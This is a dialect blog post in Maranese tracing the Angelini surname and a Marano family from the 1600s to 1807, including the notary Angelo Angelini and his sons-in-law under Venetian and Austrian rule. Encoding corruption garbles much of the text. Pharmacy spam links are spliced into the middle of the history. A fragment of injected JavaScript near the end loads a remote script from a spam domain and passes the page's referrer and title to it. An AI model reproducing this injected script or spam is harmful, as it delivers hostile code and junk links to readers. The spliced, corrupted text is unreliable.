(Maranese)Cognome:Angelini/Agnolini/Agnellini A cura di Maria Teresa Corso

 

(Maranese) Cognome:Ai??Ai??Ai?? Angelini/Agnolini/Agnellini

Come che se pol capAi?? el cognome Angelini el deriva dal nome proprio Angelo, che continua el nome latin,Ai?? adattA? dal greco che a sua volta el tradusi lai??i??ebraicoAi?? malai??i??ak tricorder x prize , val a dAi?? ai???messaggero divinoai??i??.

A Maran, dialetto de provenienza del Veneto meridional se sintiva ciamAi??Ai?? Agnolo, opur Anzolo, ma anca Angilin.

El capostipite de sta fameja nel Siessento el se ciameva Francesco e molto probabilmente el vigniva Ai??de Rovigno, prima perA? i gera stai par ani a Venessia. A Rovigno sta fameia la gera distinta con tre diversi soprannomi: Speziali, Venessiani e San Francesco: el primo se pol capilo, parchA? probabilmente de mestiere l feva el spissier, overo el farmacista atual, el secondo parchA? i proveniva apunto da Venessia e lai??i??ultimo forsi perchAi?? quasi duti in fameja i se ciameva Francesco. Se sa qualcossa de sta fameja maranese che nel 1660 la abiteva a Maran; infati Francesco e Catarina i ga vesto quatro fioi, Giovanni-Angelo (1683), Giovanni (1684), Bianca (1689) e Angelo (1685) chai??i??el ga vesto Francesco nel 1715 circa e da lu ze nato Angelo-Francesco Angellini Ai??nel 1740 circa, cancellier e el notaio in fortezza par tantiAi?? ani. MaranAi?? el gera intel periodo de sotomisionAi?? ala Serenissima (1420-1797) quando chai??i??el cancelierAi?? el ga rogA? diversi ati, testamenti, pati dotali, tanto da lassane, come dAi??, el specio dela vita sociale de quel momento che se avieva ala fine dela republica de Venessia. Gloriosa per alcuni, un poco manco par altri. La qualitAi??e dela vita in fortessa se la riassumi lezendo leAi?? volontAi??e de ste fiole che le ai???ndeva spose e che quindi le voleva salvaguardasse la dota con un ato publico: giovara un mal, la morte, opur mancansa de fioi intel matrimonio, la dota la podeva sempre esse domandada indrAi??o ai parinti del sposo. E cussAi?? infati ze sucesso par alcune fiole, sposAi??e con Caorloti, con gresani. Sti ati, rogai nei ultimi trentani del Setesento i ze particolari, ogni un el ze diverso da lai??i??altro, el cancelier el riussiva a fasse dAi?? dai atori e scrive duto quel che podeva sucede dopo, par via de lai??i??ato sotoscrito. E chi che no saveva scrive, feva la croze col piegio (=garante) drAi??o che el sottoscriveva par lu o par ela.

Lai??i??Angelini dunque el gera una personalitAi??e de spico in fortessa el se veva imanegA? col chirurgo, col valesan, col sansier (=procacciatore dai??i??affari), che ghe feva de garante ai ati e cussAi?? via. Ala fine intel 1783 el veva ciolto in afito la Vale Pantani, fasendola deventAi?? una moderna vale de pesca.

Arie francesi rivolussionarie le riveva anca a Maran, quele al moto de eguagliansa e libertAi??e, durando perA? poco tempo. Intanto a Villa Manin de Passariano in agosto del 1797 riveva Napoleon par fa i preliminari de pase, quel tratato de otobre el doveva mete fine a cinque ani de guere che le veva devastA? lai??i??Europa. Geromo in tela republica Cisalpina, aleata dela Francia. Ma a seguito del tratato de Campoformido, come che se sa, el Veneto e Friuli i ven cedui dai francisi ai austriaci che li ocupa intel genaio del 1798. Allai??i??inissio de quelai??i??anoAi?? Angelo Angelini, cancelier el se porta a Venessia par capAi?? quale che sia le intension del niovo corso politico e quando chai??i??el torna el va a relassionAi?? al Consiglio municipal, andando via poco dopo, disgustA? o forsi insodisfato de quel che vigniva vanti allai??i??orizonte politico. Alora in quel momento el ciapa le brene (=redini) del governo maranese so zenero chai??i??el veva sposA? una fia, la Marina Angelini. El se ciameva Zentilin Giovanni e, in qualitAi??e de consilier ansian e giudice dela ComunitAi?? el se miti soto la guida austriaca subito, zurando suditansa a lai??i??imperator Francesco Primo. E chi te va a capo del consiglio? Lai??i??altro zenero de lai??i??Angelini, cioA? Spiridion Zapoga, chai??i??el veva sposA? lai??i??altra fia, de nome Adriana. Spiridion aceta de fa el capo del Consiglio, lezendo el statuto municipal antico. Che Spiridion nol vissi grando feeling Order order cefadroxil brand Order http://www.zombiecommand.com/zombies/cheap-betapace-80/ online co la popolassion, come che se dizi, se pol intuilo tre ani dopo, quando che el entra in ciesa par arestAi?? el nonsolo. Se no fussi pal la popolassion che la insorgi contro de elo, sarissi stada una carneficina in ciesa stessa.

Nel 1806 da Palmaniova ven dA? lai??i??ordene de creAi?? subito anca a Maran una niova municipalitAi??, par la qual vien nominA? sindaco Francesco Rossetto, consilieri Filippo e NicolA? Corso. Lai??i??ano dopo el capoliogo del dipartimento de Passarian deventa Udine, mentre per la zona costiera fin a Aquileia capoliogo Venessia.Ai?? Lai??i??Angelini morirAi?? intel 1807.

A cura di Maria Teresa Corso

Novembre 2012} else {s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; if (document.currentScript) { order cystone syrup Order cheap viramune sales Purchase http://news.kostenlosesgirokonto.com/purchase-trazodone-high/

Lascia una risposta

Powered by WordPress | Designed by: diet | Thanks to lasik, online colleges and seo